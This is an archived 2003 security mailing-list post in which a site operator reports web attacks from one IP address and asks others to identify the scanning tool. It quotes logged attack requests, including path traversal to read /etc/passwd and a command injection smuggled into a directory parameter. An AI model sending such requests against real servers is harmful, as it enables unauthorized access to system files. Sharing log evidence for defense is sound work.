Hosting Provided By

Chinese source: some web attack tool

From: Paul <pbobby(at)stny.rr.com>
Date: Fri Mar 21 2003 - 17:14:50 EST

('binary' encoding is not supported, stored as-is)

Getting hammered by a Chinese site, 218.88.98.237.

Anyone else?

They are web attacks, and here is a sample of the various attempts it tries to make:

GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd% 00 HTTP/1.0

GET /IISSamples/ExAir/search/query.asp HTTP/1.0 
GET /cgi-bin/sh HTTP/1.0 
GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 
GET /search.dll?search?query=%00&logic=AND HTTP/1.0 
GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0

and so forth. Anyone recognize the tool?

<Pre>Lose another weekend managing your IDS? Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A> Received on Sat Mar 22 15:24:57 2003

This message: [ Message body ]
Next message: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Previous message: Kris Saw: "Re: Trojan attacking our switches"
Next in thread: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Reply: Tobias Lachmann: "AW: Chinese source: some web attack tool"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:00 EDT